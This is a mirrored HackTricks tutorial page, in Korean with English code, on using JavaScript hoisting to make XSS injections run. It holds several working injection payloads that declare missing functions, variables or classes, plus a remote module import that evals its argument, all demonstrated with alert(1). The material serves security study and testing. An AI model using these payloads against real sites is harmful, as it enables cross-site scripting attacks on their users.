mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
158 lines
7.5 KiB
Markdown
158 lines
7.5 KiB
Markdown
# JS Hoisting
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
## Basic Information
|
||
|
||
JavaScript 언어에서 **Hoisting**으로 알려진 메커니즘은 변수, 함수, 클래스 또는 임포트의 선언이 코드가 실행되기 전에 개념적으로 그 범위의 맨 위로 올라가는 과정을 설명합니다. 이 과정은 JavaScript 엔진에 의해 자동으로 수행되며, 스크립트를 여러 번 통과하면서 진행됩니다.
|
||
|
||
첫 번째 통과 동안, 엔진은 코드를 구문 오류를 확인하기 위해 파싱하고 이를 추상 구문 트리로 변환합니다. 이 단계에는 특정 선언이 실행 컨텍스트의 맨 위로 이동하는 hoisting이 포함됩니다. 파싱 단계가 성공적으로 완료되면, 즉 구문 오류가 없음을 나타내면, 스크립트 실행이 진행됩니다.
|
||
|
||
이해해야 할 중요한 점은:
|
||
|
||
1. 스크립트는 실행이 발생하기 위해 구문 오류가 없어야 합니다. 구문 규칙은 엄격하게 준수되어야 합니다.
|
||
2. 스크립트 내 코드의 배치가 hoisting으로 인해 실행에 영향을 미치지만, 실행된 코드는 텍스트 표현과 다를 수 있습니다.
|
||
|
||
#### Types of Hoisting
|
||
|
||
MDN의 정보에 따르면, JavaScript에는 네 가지 뚜렷한 유형의 hoisting이 있습니다:
|
||
|
||
1. **Value Hoisting**: 변수의 선언 라인 이전에 해당 변수의 값을 사용할 수 있게 합니다.
|
||
2. **Declaration Hoisting**: 변수의 선언 이전에 해당 변수를 참조할 수 있게 하며, 이로 인해 `ReferenceError`가 발생하지 않지만, 변수의 값은 `undefined`가 됩니다.
|
||
3. 이 유형은 실제 선언 라인 이전에 변수의 선언으로 인해 범위 내 동작을 변경합니다.
|
||
4. 선언의 부작용은 그것을 포함하는 나머지 코드가 평가되기 전에 발생합니다.
|
||
|
||
자세히 설명하자면, 함수 선언은 유형 1 hoisting 동작을 나타냅니다. `var` 키워드는 유형 2 동작을 보여줍니다. `let`, `const`, 및 `class`를 포함하는 렉시컬 선언은 유형 3 동작을 나타냅니다. 마지막으로, `import` 문은 유형 1 및 유형 4 동작으로 hoisted되는 독특한 특성을 가지고 있습니다.
|
||
|
||
|
||
## Scenarios
|
||
|
||
따라서 **선언되지 않은 객체**가 사용된 후에 **JS 코드를 주입할 수 있는 시나리오**가 있다면, 이를 선언하여 **구문을 수정**할 수 있습니다(그래서 오류를 발생시키는 대신 코드가 실행됩니다):
|
||
```javascript
|
||
// The function vulnerableFunction is not defined
|
||
vulnerableFunction('test', '<INJECTION>');
|
||
// You can define it in your injection to execute JS
|
||
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
|
||
'-alert(1)-''); function vulnerableFunction(a,b){return 1};
|
||
|
||
//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
|
||
test'); function vulnerableFunction(a,b){ return 1 };alert(1)
|
||
```
|
||
|
||
```javascript
|
||
// If a variable is not defined, you could define it in the injection
|
||
// In the following example var a is not defined
|
||
function myFunction(a,b){
|
||
return 1
|
||
};
|
||
myFunction(a, '<INJECTION>')
|
||
|
||
//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
|
||
test'); var a = 1; alert(1);
|
||
```
|
||
|
||
```javascript
|
||
// If an undeclared class is used, you cannot declare it AFTER being used
|
||
var variable = new unexploitableClass();
|
||
<INJECTION>
|
||
// But you can actually declare it as a function, being able to fix the syntax with something like:
|
||
function unexploitableClass() {
|
||
return 1;
|
||
}
|
||
alert(1);
|
||
```
|
||
|
||
```javascript
|
||
// Properties are not hoisted
|
||
// So the following examples where the 'cookie' attribute doesn´t exist
|
||
// cannot be fixed if you can only inject after that code:
|
||
test.cookie('leo','INJECTION')
|
||
test['cookie','injection']
|
||
```
|
||
## 더 많은 시나리오
|
||
```javascript
|
||
// Undeclared var accessing to an undeclared method
|
||
x.y(1,INJECTION)
|
||
// You can inject
|
||
alert(1));function x(){}//
|
||
// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
|
||
x.y(1,alert(1));function x(){}//)
|
||
```
|
||
|
||
```javascript
|
||
// Undeclared var accessing 2 nested undeclared method
|
||
x.y.z(1,INJECTION)
|
||
// You can inject
|
||
");import {x} from "https://example.com/module.js"//
|
||
// It will be executed
|
||
x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
|
||
|
||
|
||
// The imported module:
|
||
// module.js
|
||
var x = {
|
||
y: {
|
||
z: function(param) {
|
||
eval(param);
|
||
}
|
||
}
|
||
};
|
||
|
||
export { x };
|
||
```
|
||
|
||
```javascript
|
||
// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
|
||
// It was injected the: let config;`-alert(1)`//`
|
||
// With the goal of making in the block the var config be empty, so the return is not executed
|
||
// And the same injection was replicated in the body URL to execute an alert
|
||
|
||
try {
|
||
if(config){
|
||
return;
|
||
}
|
||
// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
|
||
let config;`-alert(1)`//`+"
|
||
} catch {
|
||
fetch("/error", {
|
||
method: "POST",
|
||
body: {
|
||
url:"https://try-to-catch.glitch.me/"+`
|
||
let config;`-alert(1)-`//`+""
|
||
}
|
||
})
|
||
}
|
||
```
|
||
## References
|
||
|
||
* [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios)
|
||
* [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
|
||
* [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|